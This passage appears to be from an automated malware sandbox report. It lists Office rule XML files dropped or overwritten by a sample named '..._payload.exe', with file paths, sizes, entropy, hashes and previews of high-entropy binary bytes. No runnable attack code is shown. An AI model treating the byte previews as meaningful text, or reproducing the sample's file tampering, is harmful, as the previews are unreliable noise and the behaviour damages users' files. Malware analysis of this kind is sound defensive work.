                                                                                                                                                                      Preview:<?xml.1Z..7.........O...N..Y.....|~....}.7.RD`.8.}..G....U....~....M...+mt.+]....{....oh..GVx..L..h..(g-M}.m !P6.E!A.......!...#7.>$.....E.,......Z.`):.....7.+%...%'F.....)......)<..^.D<&..}..9.8#...a.un..S|]..L...9.T..s.F../..0xi.........#).b.O...9.lb.}...(.8....Y4P.a........)Z..a...6.(?....^N.9i..k.R.0......`A...kJD..q1..L..b../'.C..?J.(S..%`!]..{.)...x.nC.../..h...0...F..0.ky.$d.1>....d.M...3|cI..~ ..f.N+k.e....!.}l..tKYL..jR.{K.I.h}.6J..M..F.t....1:.x.y..f?....uV..t....r.....<w...%...X.B.]7.~.v.nB...4..@q...A.H...U.K.j..........-...........Y..L...I.*.-.w.nVf.03f.=0...\..k...b..d.....1...H~........X...N.X..;...b...$..;.K........f...:.....iQ..u.k.8R.b...=...W....H....d...)...=R...1..........SjY:..2......}.....j$.y0...d.?1..o..m.t7/."..PP.F.*&.]|..E\4.dDch-.9..6.9?...[.Ry.h+..2...,7...S....E..C.Cl..5b1..@.KQ.gBu..RGmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10924v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):891
                                                                                                                                                                      Entropy (8bit):7.738119807465036
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:LYyip4Na/d04UR3l6LVllIou+HdKQfPzP+bDJg2u1ajYp1lgtDfvuwXneUqoWSUn:M0a/s3lUl9HdK2D+pgIYp4VeOezoV2bD
                                                                                                                                                                      MD5:0E3DC977A6D61EBA5084BF1EAE842A92
                                                                                                                                                                      SHA1:83B5135CB9F1F28E3201C6D543774B4818C0F068
                                                                                                                                                                      SHA-256:960E79E63C6092C82B74481C21340A0F54294CEE48D3F09BA7E0AA1CC75233EA
                                                                                                                                                                      SHA-512:80E9569BDBAE7C41D73AF6518612F598656E072EC1085D229938B2A0F7DD728ABD3FDBC69AD18D56492850A6ED30037EF79577C3CCB9675608EA13790A7742F8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml:.....p."B.;....vi........R.0.....Zk:...6...h.[.........!..Z..A...C...db..Kx4...M.].@.^..Z.o...2z.(y..]...zz.d..T_6........_.e....N..H?...M.L..Y.0......`F..*K......q.H..m...s..v3..6.......M...[.e..d11.z.}...h..1t..o...x...~.C.-..C.a.5..Co....._.2.Y...g.vbW.i..k90.r.C.j..l..>..2CMt8..p....\.J.s.......W....p.8..3....j... G..DTA..r.zX.q.).hQcv..y..R-...x.G<.5.5V(&............F-....r.......?..a<..9^.......>.V.9..f..C.$/Lb?..*cR..._..c.D p{..q..z.:..'..[v..].....CE..mb......O,...s.~y]....F..R4.^..Q..v.D_.'.7Js.o.k..bV....R...H...K..S...ay.x.8..mPl..._d..D.=..........M.OM..z..s....z.*l....f...o...?..?..$#Q$......G...5Z.."'C..68.>.#....$.....I...<n.{$.m..)..[.[.^i}.Vd.+G1..Iw,..1.eV...T.D.j..x.....=..H....?`Z.h#m9Z.........C.M#f.Z..|i{.p.{...s.4r..y....zmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10925v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1049
                                                                                                                                                                      Entropy (8bit):7.835372526117738
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:m7iymWBBKRt2MXs2ZRK/8+uoYNipuMMQiX4SqdGV1U9cUe+n2bD:fymWBByt2MXTRK/TYNUuMMH4SqdoKqzH
                                                                                                                                                                      MD5:A4BB5D238DCB580A8F137ADBC630AD63
                                                                                                                                                                      SHA1:068908699B5B10D1C23185C8D2B847BD5F6E7C41
                                                                                                                                                                      SHA-256:3AC42CD07DDFAAA8C4CB382F83123992D52DEBD47A8B70EA627993F200B386C5
                                                                                                                                                                      SHA-512:7AFD0650F0D7C1A55D1D1518991A10E42E3C056B9DAF3103C54DBFDF66D53D32B6730331CC4B30BCFB23217506674F979E437A6411BA323BAC58041776FF49FC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml~..*.`.IZ. .u...)j.....]R.Y...x=[.z!.......lS..}&..x6.YV1.0!z.:..J..@...&.\.D......x...+.BD...&O....(.(.!.......Y..5&....j.mw.J.%.....^.!....=.p.W.M.....eW8.#........4d(......h...r7.$...}.F.Q......S..VgW..w.......W.`[n......E.k..OM..j...&d.Ir..z.x3..sRu....p.o=..bV.'z_.R.B...J2w.6.*0.m..*...T.#.E.......8..@..=.}..K.:....Y...u.. ..........A.P..`?.Q.n.g.....:.%?..O.Q..D.S(...U..2I'..e2i..4.f....C5.@U?......4.`R.y..j....y....yk..kF..?..zh*.._?.....g..].Q....P...c.>...A.......W.._... $r.8.b.....x.............E.i.H..dfj..N[...)0.B.......j6.6-.H.H....8..Tq....d.o..:.[G..............L.,..H...;.....k.K\.?c...D.q7..x..-.-..#..B..t....P.......4...9..^*+..y .v7`...`!..L......)+itA#...5=d..O.#....V.2..'n...G!..$d..{..j..........(_..r.v.`I...d....*.....EY..\.GE....pL.^./.....u.... h..0.;.p.-M....C6..i...r.@D..."..1.?G.Z.F.X..~...L....49..7..JX.z...\.Ut...G.....D[..Ry.g..nX..MI=..|*o{*<D.%..?A.....M{.|L.mMsRxMUuXypapZbGOAfxD9pczHmW8

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10940v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):885
                                                                                                                                                                      Entropy (8bit):7.77240065903306
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:IXlrrgXmfa5Ta8un93fhxJhnTt3lhHVHlJ2bD:IPy5hY3f3HTZlhHGD
                                                                                                                                                                      MD5:D7D7AF03265D77AEFAD63A52DEB05690
                                                                                                                                                                      SHA1:76B8A0BCF66A15A38EF1A2326693F168D6173BFD
                                                                                                                                                                      SHA-256:29104BCA510BC12CFAA43C4CD730DB297BB4826B238C71CD861679FB41A1B42C
                                                                                                                                                                      SHA-512:89ABFE8287AEC96306209C194E144C34C54F5067C68BC730C14F564AB1D6D6E9A693012B85324F136DF58EA91C43E3C9B78B40B318B3172901DA917D22EAA4C6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlb..w.;R..M......M.....#.....po......&Z.(..i.._.<..&..J..M.19i.....vr..cf..q.e.+..3.xZ2O?.k..ld=......$....O.7w<.E.....cP<B`..$.R....=...E...e..rs..D....9.j^. .n!Wwz.}..s..>...C<..j-..ob....D....m(rv.....,..&.......L3...}`......8......iY-=.."\.....M...c;O........I......pE....H.,V.....K.._m..L..I2L.(.A.>.*..............X["..v..*....Z....B..r..L*...R...F...,."(.V..{.e.W.w.)..7.V.EI...t^sw.E...+o.Ec...g&F....50m....`W_'.u7e......9(c~.~...O."..!c. ....(...Wx3..s..w.Xu.|.u...w.\-.x.3+Bn>.L..y...r.{..(S...l......\...\.C.....Uj....Y....R./.Er<.......3.f.l.......mQq.%9.Wh..PK._4.......0.8.....gzO$...N.:z.N...C_.V.e.7F.^N.*.p./C.....}|/......HnO.R.n..'|....|&.a. ..)^p.)@M....9\>...sn.Y.G.t+....G.....?k....U.:......||..C.x.?..v.."o.6....@......M..?~'.l`\.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10952v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8529
                                                                                                                                                                      Entropy (8bit):7.981032121678648
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:SMmbFmiT4DEuhFnNg5rLBjV54ooUhket0ZJkx5+l:Rm4DEur4rlQyhRt2eD+l
                                                                                                                                                                      MD5:ADB930E0222CD6CC20D7E95907574C08
                                                                                                                                                                      SHA1:B9CDF02CA7BA073960142061CAAC9FB447742EDE
                                                                                                                                                                      SHA-256:05763BF5C033B707BE04C8CDBE47E2EB57FEA5E3B63E779B5714E3946E83ACE1
                                                                                                                                                                      SHA-512:84593F16CA0563FAD187CFCB1B68177246ECB1DFEF2424EA86F623C78F816513046F6952A006978595E68E9C76DEF27EF227F53C7C53DF12AF6CCC6365A05F5B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...\..s.#...9.Vw|.Z.....5f..o....;.1...3Vb.XO_ir.2.#*..Y...~.+..f...T.S3..n..b8>}{q.ry..m.\.....N..pm.....9Fje..........$E...t.=.....|.............]e/.=..Y.xX...:...a.G...6.y..g.......W..e.i"..Z...Lj...2.X.Yr.&Tki]v.+.<=...../.,2.-R...<......!+!.........d...o......h...u...x..1R..M.R../.;.......\.6._D....4I..x....P..}n......kK....M7....9D...:.h.J.."..M..`.K...j.z..w%EW....?^oI..i.$...-.....1....u..E.f~d..Ai)iH4."B....|.o..www.|....I....]6./...xJ..>)R..1s.~.....B........+u..p._$'!L.V...G..].!..w...(.~.....>.~..#1..c....Tk..U^...r.[...._.......p,..z..Si.3.\;e1.g..M.[.nE.$$Y...C..#~....2.T:..l....,e/Km...w.S.{..x...!:`5....Uy.....:.......5..J..h,.....^W..o.{$...l.])...1<DrA....1.$..{s.|...b[.rJ@[;....x.D..n)=.B...4...xhp..+.:uj.i...#,.|...l.....ME....?.......#...8l.a.s.8N.._$ .>.j.V].2..S-F,...0.;"v.iW..oxf. I....q.f...Y......Q...;....^..}...w..;..._W..Q0W...$.1G....s...R...$......8..*.[%.....T.G_ER1`..d..5..N..Q.../...2Cd..0.FSn..M..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10955v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1242
                                                                                                                                                                      Entropy (8bit):7.821704671243194
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RTRJM6pHuyfpHeLSeZC/jC6BqALgepC882bD:lRdbfpeLS/GGgk/PD
                                                                                                                                                                      MD5:FC3B13BBAAA8883A0C7E39D809EECBAD
                                                                                                                                                                      SHA1:8CEA46D55F50B74CC4EB54FEB186A65153B16D4A
                                                                                                                                                                      SHA-256:4EA725ECAB9F578BEF7CD2C5246590F03A48E882859E343BDA28F539BB2DBA61
                                                                                                                                                                      SHA-512:A7FEF0217E18E3B1F639A0606AFC506E88C70874537CC0A35CEA42BD2F4F8B25FDCB7C225F565246B96CEFB8795708D779ACBB6B865041F4C04060CB1908352B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...~.lo...Z.X?....cc3M.........@bF...._....{.)..cD..;.......w....5..<..R.....o....*v!.e..Lp.,..#I=>....j.t..;lC..R[..j.i.<...:.m..l.....4.[....8I4.$..B...emB.....H......T=.@_..y.U|vk.oTi..8.. ....H...\..nS.y G....]#.U...Q.8...v..w.....F.....".=<......o.y......7....Y......M.\k.|...EtB...[7.fF....+.7#.ZRB{.....x7J.h.Ny.......ue..S._.s...Kv...At...P....}...4B....w.......'..WA].......|...V.@C..*.5'T...4.rO...d.%8.^I.U...2!...>k..".[.uC....w1!.Q.t.w.~r.|..........3J.?9........;........B.6.P....h9..V@.]+..b_...K.a..^.@W.}`..5R..W.X.-.4.....G.."xT^.,.....]J<.E."s.?{.*...m.,.j.'...mJ-.tr..*.#...`......\.T c..1.-..~....q...[...............o......`\..}.g.j.j.&Q..fn..^w..........'...9Rn..^.!..%..X.....g.......t.m>...!"e.l..&.aP..i..`...A..6V..K...7..g.p.+J..PO....h...[....G...aN...I..3X.*.)(.tV...NW.J)*..3W^....a..o.!a........8..i4.}U{........8..N..EO...^Q...v.p.\>r...-0....\h.Jma?\....A. ._d....-.XS..>..E}..Ee(.Wb/.....j....;.i7....*...V............

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11150v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1185
                                                                                                                                                                      Entropy (8bit):7.781496905333516
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:06IVHHvf8dSIoIWMibQ2VJPNIYRuwFQj36UyGNIyGuUMSceQJOBsWFW2bD:06OwoRtnRP0qqNJ69D
                                                                                                                                                                      MD5:0C6C26B5D330C8BBB1E2C9AF9952503E
                                                                                                                                                                      SHA1:D8819B5D361A343040CBF31ACE3C00C6F4554626
                                                                                                                                                                      SHA-256:9D384957A6B96408EF32CEEC0F083D117662E80CFB7C82E993E9AC1CBBB369A1
                                                                                                                                                                      SHA-512:6CA4B358F8E92823356F00EC7124A53EEC35E5D64039CA4876F5FAA8B60E4FA29C513B17F04AA4FCAB20C02815B52DF9A4DBDFE7B8519C8A49E151AF837CA88F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.o...B.....c..P.E.G..d..#..G.5................%......t.H..g?..^c?..2.s.....d....8jp.6%NU.@..B....:^=/C<Z..-[.C.=v..b./....k.............?.D..-X.dY6..3....8BR..).I.)J......q.....ETT..i..RJ*B.....I.h5......>uB....pw..D..h......Z...R...g..$.....ZK.pSm.......5...D=UF>.N.m.%........DoN..P..]@. .w5.FdN"...MsO.)d_..%.?..2v..Ct.V....vH.O0..........$....\X...E.s........52...b+p.,._...nb..T.h....p.l..^O...?....0;..d..Y*......#...!6.b.T...._e....D.f@....C..J.0.....sf....mp%.m..p...O...)`N......#Rl.t.L..........F.n.l.?...4.....RU.az.t^.....q.L..a.BS...Y|..75LE7....?.C|O\i..0-N.....`{.W....SNx>.@?<.......ZG.#2V.=..h?.....[=U....O.X.;.J.6..C......<.:....)...S....9..O.a.........f.....kl#.`bc.OI..4j,$..&.hZe..4...co.M..4...[p....._l......$J....b......5S. i....C.o.d~.g2....8.oO..1.|.&...,^;...+N....H+...uM..P.}.hE..G........7A.CRm..d...L..h.U.?'M.,.T. #<.}..O<.RAD......)$G.>...$/.....6..`T..M....5H...c..&do...K...(..^...t87../..&8..+.RY.2.C[x..oW...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11154v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1073
                                                                                                                                                                      Entropy (8bit):7.81575598933099
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Rw+j6mOgdze5Sc35BeWeEraw9CY5MCmYi8n0mqjeIx2bD:Rhji2efBfe2BcY5MCsmqjsD
                                                                                                                                                                      MD5:91D6B8B2506D1875DF683EC5AAA30B67
                                                                                                                                                                      SHA1:293E4AD7402752D4EAFBB29BFE631E9660F12A57
                                                                                                                                                                      SHA-256:BBE1779E7684970A76D4A82D93A1CD66BB20B83273A3A995659D2F3EEF1071F3
                                                                                                                                                                      SHA-512:BC31D3533A524AB80054C29236DC674D68541F91A7A7A57FB1BD00DA73442D6256049D2BF17AE580535F44969A73D39BCC40B422931F78C45D9E013223C735F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml6...........C...K..........._./mV.....*.Z...(....g.OJ7`*.c.e.#I.U..b..+..EK.......!^.0..y..".n.B..nD9....e...mS..,.`T.V);].8)..Q..v.5..#...f...`....q...(...o.J../....{.v.)]..n.n..c.>............p.).~...}....m... ....GH......Mx...|..r..E@,...'4eqQ..r......x>.].....T.Q..dT..2NS@u.M..2......F.. .y.t.....U._qH....1o....#....*.....L.N.L~m...(m..\..d.}.....%..e..4,.F....~...W2N{...'Tg.c!......_.Q.&......D..^..^...{.......!.G.L.o..KMBW..Oj7..a.....Q.L......rT@......5/O. ...1.%.......!}......V>.9.X>...GHP:..a..A.I...w%...n6.F.W.i...\........c....i ?.!.k.bR.....>..9.].sd?.Ld.J"6......y....6..O...Y.@..a.7..G)..nT1..o.W....o.xV..Q.~.. .2....c..q".E.../..*..g.Y.Z..)"Z..&.:..m...A.s;.i.u]..>.g.......0.Q..3Wc..j.J..U`...].CA..... .."..e@k.A.x..O...........O.g.`7...-]W....J.YZ..Gf)........3a.(b..@.q.N_.11.W..C.....Q;.!.....dI....Zr..y.Z.T-8M....7..........R.I......l2e.....oj.."Dk{.z<8.m..Bt.-.c.M....zef.6.a.?.E......-2.\?.D.1Fx..*mMsRx

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11187v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3232
                                                                                                                                                                      Entropy (8bit):7.949235213590541
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:pjiG1yIR0/zkjFUPzBlLdHGDYq8c3mZStyJRuD1dt+e8K8nf8g5HWvAE6Tf3D:pJYRL7B2x/3mTRuRXM9nEg5HwAE67z
                                                                                                                                                                      MD5:C99994C0BBDC83E6C2F8D2487EB44D93
                                                                                                                                                                      SHA1:0E7BD4B5EAAC05DF771E20832B535EE27D01160D
                                                                                                                                                                      SHA-256:029F5C454F7B8E903D4F98FDF71A946A583F26A46B7B663BEEBB5CA8D3703300
                                                                                                                                                                      SHA-512:A9C4A2D76CDFFCAEFD2E456083D65750D81B588681B8B767F4AEAE201C3949304B9F73A79086F2E4309D996D340A677FC2811223492EA964270A2DA50DF7EB32
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..H..;..u5X.0&.{......H..+H...*y.y:.j[..D......64o...I.. .Npv..n.G.5G.<...@.T5...I..B~..R....GBJ.*.w9...Thx.. *..D....x.1...... RaJ/KR.t/.}.2....6D].v.]........X.v..WH.....\.>....V.w..M..3."A....N"....[./.c..o...&.i.Z.Ewja...S...d..:T.)JX...?.zK..G..5C.G..3.i...x].....ka.T.. .P.).M....&....V.a.q1.}.1...7..Id..rR......c......u)[.l.;.V.$...R..?.I.k\....dA..!..8..,.h.R.qf...<.....u..K.=...g $..,..H.}/..].....2.ay!0..~....p`.!..{..j..U..s.....V..X..\....tsW..w.k6...5.q.....G.!.8b...dL.+.$.N...L..l.n...C.:..r..c.P.F.w....s......:..&.r...i..:.3q.4.w1h$>.H%r..>7.....~a..;..*..e..<.G..W...c9...{....P.X...{h&d.rc..T..... .g..U..`.]...0@*.^X0....T[xvU.X...3!.y.z0{..N.....o...V+..f..../.pq......Cg...K...|..4>..CQC.pP. ...kS|....n~jK....er..x.:Hw5.P.5..Dw6.G8,1!.e.b....g.H@..... O.....T......R..q.T..A..".iQ.......~.......u,.......gK.....F..9.f.\.=z...|...W.r^i.x..HOA?..%ch.kjT.n....]_.C.m...n......]^{0.;.;...R...eU.....y%.\.....}.O.xgS.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11190v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1231
                                                                                                                                                                      Entropy (8bit):7.838607404396064
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:UVwoOe/fIMzq/f93/EH3cWEtsXozgX7C1F8JrJLTKZlMF7z+v164SnM2bD:UVL1/Q0kMMptsYB1+XTEl8z+v164cD
                                                                                                                                                                      MD5:C67289DC7AFBAA1ABA1A53AC876EBAD8
                                                                                                                                                                      SHA1:18DF0D1E8891847E6B1D22A2BEFE7F07F9783F74
                                                                                                                                                                      SHA-256:99B2F55DDBDF956A7ED459FA450E2AF5FFD44DB222B43CB81DD80D1BA62A3128
                                                                                                                                                                      SHA-512:B383326499C4FBE3D24623D3A187249787D26C2B9D698AE8FC81C680DCC03C4E9863C2CA3A0B96C6729EE51ABB41B93770CA21EBA0C3FE9E5D3CFB7315395E52
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.X.`.^v...}N.._..z+q6..,]....F{.B{...M.....s..P _1..w...5.w.$.....#?..3,..xj.)@...[.....w.Ol.G...O=...N.H.....e=@..z....|m.^vJ...rz..........D...5&.v.s}....,.s_...5..>....lO=. a.O..t...R..-.Z.E....R.2..Nf{....V....G....Q.....u.IZ..}....f.Uq<$~../.v.....H.Eo..d....>.D.;.C.!....k.$Bv....HkA.n.W........y.{5W...3.l.%.i.......2r....S..vhp..%..\<.&.O..R1.........o..,.AE...?<...51C_kg....F.z.G.../..........T.8.;....e_.i6.G:...-.p........y...>LK...F..H..{....0..."V.S.2a.z,..~9....I2@..I.VEa..<x.?..j}...gi......*.8...uC.....a.Ek. o...1^........^5....m|..q.c...J..7.E.pD\..8-_........#K...B\........c..d..._$....wi....Q%8.v........j....T.WZ.c.........?LhI....dN.R..&...v.7:2..T..L..\...~.......syQ}..g.J......+.6..E.......]..L....G../....(..L.?C....1....hd...1..`.XQ==..e....!P..8.U..Gy........r.RY.8.h51Y.{..l/._..PB...h}y~...X..Q.B.?...b...EB;/j.)...W..>.v....3t{.1.B2&w.-...S...c...C...cf/.NE7..8..9.s.H...F._.[..c..`&...:D.^}m....oD....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11195v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7567
                                                                                                                                                                      Entropy (8bit):7.975942390356842
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:n8QRZX6d1zKWn8n9DPWXXYDH8f/RX6WP20Cs858qnu:n8kXY1zKW814aHCXNP9Cs8S
                                                                                                                                                                      MD5:CED30563F462B97893F01CC75AD0F8DB
                                                                                                                                                                      SHA1:A260DBD38BB9C4A4CFC7AA13B12291F705BA0DA4
                                                                                                                                                                      SHA-256:59B8AFDD22686F14B65CB9B4D90F459DACC4297684CFA033C22404F211D9E09B
                                                                                                                                                                      SHA-512:A745917651225DA65389FD4CC3CAB18E17E1313AF1C76CA8F4AB226C83571DAA1B9322C94EDD87928E5C030627E63102FA3CAE5AC1630C38A28607EEC87C2A13
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.x|..~...wY.l...}R..N....'..[.w........u.LpIiF.D)r.r8^...e0..'.D)....bY.......`..9.....buO.R..!:{\. f..l).{.y.R.....,Y,..MQ.?.o^..5...E.W;.+........$;~...sSA>Tb......v..,..d.G4A.z....+...}..Y.......q.h.M4......Y..."4"..........%.s#....7...eJk.4"u..H..$~6.f..R..*..W`..2X>:......t|..................j..`.....5.<8....7h0.{....E...z.G....f~..+.X.A..X.O.9W.r(m.>..t..m.*(...j.....%>..........p.S..Z>k........+..dls.,..w..B.DK].4....$`..47o...sI...A.h[3..8.......r..5...UM..1-.t....M..O.J.X...Xk,`{..hY.f.......8..;.....LJ.T..}x.i0..y.j.....W....../...2F?...-....JDE...O..d....o.....O~.C.....$.....:..JO....(..#.........v}d..9l..XRr9.....G{].H`..=.r~W.p.....,...|&..g...y...tt....ssI.. ...So'.;0.....5...K4H1..n.$..S1..jv...j.....X.g.l...]K.......<Ym.T.t.5..a....N.8},..W`F.z.....K;._..F..#.J..)...}BI..Z.........YZ.|.u]v...z^........_{....v...:..X..v#.,.).mK.......WL..#b..[.....d.T"../....".....G.....q.:.:..]!.....A^.u'.........Z...t.@\..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11208v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):816
                                                                                                                                                                      Entropy (8bit):7.7392835416949275
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:fFIvzwn5qI31fwX68x6VzI58HJAyzFRsvHJXi48xggJ7Hgq8eez18sATjQSUdNcq:fHv3hSJEzI5WJA0FoH5GO6U12PH2bD
                                                                                                                                                                      MD5:99E570B314D8690D4090AB81C9F39FFE
                                                                                                                                                                      SHA1:1A577BAEA36D92B2C7F6F997858D041F28E64F86
                                                                                                                                                                      SHA-256:C57873913229D2102286F3C49AC325168FFDA4EDF73FC93B966439D3641DE266
                                                                                                                                                                      SHA-512:872EB7025B7890BD1C8C7B96E3CFE03A43ECFA017BF2B93B027F3C8197D2509246F12A5824E5AC008ACA4C8BAE24434FB64CB4C8DDB8C4DCF6D05AD87663C0AA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..3.[.......!.v...`.u...e.a.T.'.LR...A>.l..4f....e./.).a.....<....&0.....J.#.O..7.....+[..<G.H.0.L.d.F.a......Tt.D_PM.^.....].`8..m..;.!Ap.=0.2.1.k.L...o/E.8I"...D\j.n...u@..[.2;;.B.yA....'.i..[)..v.@~.....'[.w..G./......,.d..K1...lXH_.=...'.0...#..#.)zx...L~.|.r_.U.._....G..i..MS*'..*.NC...+..];%.!.....b...~j2.......[.st.m......o.8...xw...).t-...3..w........ ....[2..T.j..,.._...X...#.d....T.F{..[.T$Z.^pZ1....s.\9&.J..g...-.z....V.m..QO{.~...`...~.}Y=)...>..C.! .5..l...e.V.F....&.|..6.8...j....j.......|W.~.B.0].CObb...+.....pL.....\......1)..5.@..\.6....oc........h/H.....)`<..../m.....xi.I........!TV.+..T.....V.N6V...R..CR..@.YB..M$;,.x.9..'VzN=.4r9u....PG..s..qQ.E.>......#%.v.Q.'B........J..mmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11209v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2272
                                                                                                                                                                      Entropy (8bit):7.909812345088532
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FnCno3hhfR71YcxKhUkvStf7PHUK766lumcheD:FCnofnLwUwkft/Ifhm
                                                                                                                                                                      MD5:425BF85C26D67381CE4F71FF44003747
                                                                                                                                                                      SHA1:7D64FB5933D4C8135E83A4E6FEB3A38AD4517E7D
                                                                                                                                                                      SHA-256:1C1CF1CB337E1D2A8C52F766B69B1B6658C84159572E10C0B1288E63C04663F9
                                                                                                                                                                      SHA-512:548AD639DAE82387C067FE4223A9B32B28957A83A1786EEDBE8D54D29A943A74905EA5CF74D8A59634641E12E20B28FF94F959299D94A75B6708B71DF521434A
                                                                                                                                                                      Malicious:false
